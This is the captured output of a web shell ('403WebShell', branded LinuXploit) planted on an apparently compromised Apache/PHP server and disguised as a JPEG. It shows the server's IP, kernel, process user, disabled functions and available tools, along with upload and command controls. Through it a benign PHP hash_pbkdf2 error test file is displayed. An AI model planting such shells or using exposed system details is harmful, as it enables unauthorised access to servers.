????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.22.120.195
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/ext/hash/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/ext/hash/tests/hash_pbkdf2_error.phpt
--TEST--
Test hash_pbkdf2() function : error functionality
--SKIPIF--
<?php extension_loaded('hash') or die('skip: hash extension not loaded.'); ?>
--FILE--
<?php

/* {{{ proto string hash_pbkdf2(string algo, string password, string salt, int iterations [, int length = 0, bool raw_output = false])
Generate a PBKDF2 hash of the given password and salt
Returns lowercase hexbits by default */

echo "*** Testing hash_pbkdf2() : error conditions ***\n";

$password = 'password';
$salt = 'salt';

echo "\n-- Testing hash_pbkdf2() function with less than expected no. of arguments --\n";
var_dump(@hash_pbkdf2());
echo $php_errormsg . "\n";
var_dump(@hash_pbkdf2('crc32'));
echo $php_errormsg . "\n";
var_dump(@hash_pbkdf2('crc32', $password));
echo $php_errormsg . "\n";
var_dump(@hash_pbkdf2('crc32', $password, $salt));
echo $php_errormsg . "\n";

echo "\n-- Testing hash_pbkdf2() function with more than expected no. of arguments --\n";
var_dump(@hash_pbkdf2('crc32', $password, $salt, 10, 10, true, 'extra arg'));
echo $php_errormsg . "\n";

echo "\n-- Testing hash_pbkdf2() function with invalid hash algorithm --\n";
var_dump(@hash_pbkdf2('foo', $password, $salt, 1));
echo $php_errormsg . "\n";

echo "\n-- Testing hash_pbkdf2() function with invalid iterations --\n";
var_dump(@hash_pbkdf2('md5', $password, $salt, 0));
echo $php_errormsg . "\n";
var_dump(@hash_pbkdf2('md5', $password, $salt, -1));
echo $php_errormsg . "\n";

echo "\n-- Testing hash_pbkdf2() function with invalid length --\n";
var_dump(@hash_pbkdf2('md5', $password, $salt, 1, -1));
echo $php_errormsg . "\n\n";

?>
===Done===
--EXPECT--
*** Testing hash_pbkdf2() : error conditions ***

-- Testing hash_pbkdf2() function with less than expected no. of arguments --
NULL
hash_pbkdf2() expects at least 4 parameters, 0 given
NULL
hash_pbkdf2() expects at least 4 parameters, 1 given
NULL
hash_pbkdf2() expects at least 4 parameters, 2 given
NULL
hash_pbkdf2() expects at least 4 parameters, 3 given

-- Testing hash_pbkdf2() function with more than expected no. of arguments --
NULL
hash_pbkdf2() expects at most 6 parameters, 7 given

-- Testing hash_pbkdf2() function with invalid hash algorithm --
bool(false)
hash_pbkdf2(): Unknown hashing algorithm: foo

-- Testing hash_pbkdf2() function with invalid iterations --
bool(false)
hash_pbkdf2(): Iterations must be a positive integer: 0
bool(false)
hash_pbkdf2(): Iterations must be a positive integer: -1

-- Testing hash_pbkdf2() function with invalid length --
bool(false)
hash_pbkdf2(): Length must be greater than or equal to 0: -1

===Done===

Youez - 2016 - github.com/yon3zu
LinuXploit